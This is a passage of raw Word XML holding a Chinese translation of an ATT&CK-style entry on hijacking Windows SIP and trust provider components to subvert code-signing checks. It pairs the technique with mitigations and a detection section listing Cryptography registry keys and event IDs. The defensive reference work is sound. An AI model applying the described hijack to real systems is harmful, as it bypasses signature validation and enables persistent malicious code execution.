      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供程序的</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> FinalPolicy </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，即检查解码和解析的签名，并做出大多数信任决策的位置。与劫持</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> SIP </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> CryptSIPDll </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证间接数据函数类似，此值可以从已经存在的</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> DLL </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或恶意制作的</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:t xml:space="preserve"> DLL </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重定向到适当的导出函数（尽管信任提供程序的实现很复杂）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4254737F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>注意</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>上述劫持也可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">DLL </w:t>
      </w:r>
      <w:r w:rsidRPr="005450B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>搜索顺序劫持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>修改注册表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDFA1B5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>劫持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SIP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或信任提供程序组件还可以启用持久代码执行，因为执行代码签名或签名验证的任何应用程序都</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6876">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以调用这些恶意组件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4B7D09" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="59383E15" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6D08ABC4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="00B274D2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A229D0" w14:paraId="7881C6C9" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DB28265" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A229D0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
            <w:hyperlink r:id="rId78" w:history="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24414F09" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A229D0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启用白名单解决方案，如</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:t xml:space="preserve"> AppLocker </w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或设备防护，以阻止恶意</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:t xml:space="preserve"> SIP DLL </w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的加载。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A229D0" w14:paraId="42F5A564" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B407E7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A229D0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制文件和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:t>目录权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="069FFE91" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A229D0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:t xml:space="preserve"> SIP DLL </w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的存储和执行限制为受保护的目录，如</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:t xml:space="preserve"> C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:t>\Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，而不是用户目录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A229D0" w14:paraId="6023806A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64D6C751" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A229D0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制注册表</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:t>权限</w:t>
            </w:r>
            <w:hyperlink r:id="rId79" w:history="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA94E09" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A229D0" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保为注册表配置单元设置了适当的权限，以防止用户修改与</w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:t xml:space="preserve"> SIP </w:t>
            </w:r>
            <w:r w:rsidRPr="00A229D0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和信任提供程序组件相关的密钥。如果不阻止对注册表项的恶意修改，组件仍可能被劫持到磁盘上已有的适当功能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D0257D8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF0E48A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="TableText"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>定期对注册的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SIP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和信任提供程序（注册表项和磁盘上的文件）进行基线，特别是查找新的、修改的或非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>条目。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C71A0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="TableText"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> CryptoAPI v2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>CAPI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>事件日志记录，以监控和分析与失败的信任验证相关的错误事件（事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID 81</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，尽管此事件可能由被劫持的信任提供程序组件破坏），以及任何其他提供的信息事件（例如：成功验证）。代码完整性事件日志记录还可能提供恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SIP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或信任提供程序加载的有价值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>指示器，因为尝试加载恶意制作的信任验证组件的受保护进程可能会失败（事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID 3033</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1FEBC1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sysmon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>检测规则，和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或启用高级安全审核策略中的注册表（全局对象访问审核</w:t>
      </w:r>
      <w:hyperlink r:id="rId80" w:tgtFrame="_blank" w:history="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>设置），以应用全局系统访问控制列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>SACL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>），和对与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="PMingLiU"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>注册表值（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）修改的事件审核，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>信任提供程序相关的密钥</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A422C7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:t>HKLM\SOFTWARE\Microsoft\Cryptography\OID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D71A10" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:t>HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0FB5B3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:t>HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BA5E5B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC2AA17" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F4457">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>作为此技术的一部分，攻击者可能会尝试手动编辑这些注册表项（例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>Regedit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）或使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00487D05">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>Regsvr32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的合法注册过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330416D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>分析自动运行数据是否具有奇数和异常，特别是通过隐藏在自动启动位置来尝试持久执行的恶意文件。默认情况下，自动运行将隐藏由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>签名的条目，因此请确保取消选中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>隐藏微软条目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>隐藏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>条目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEBF6F7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D6E2D8E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
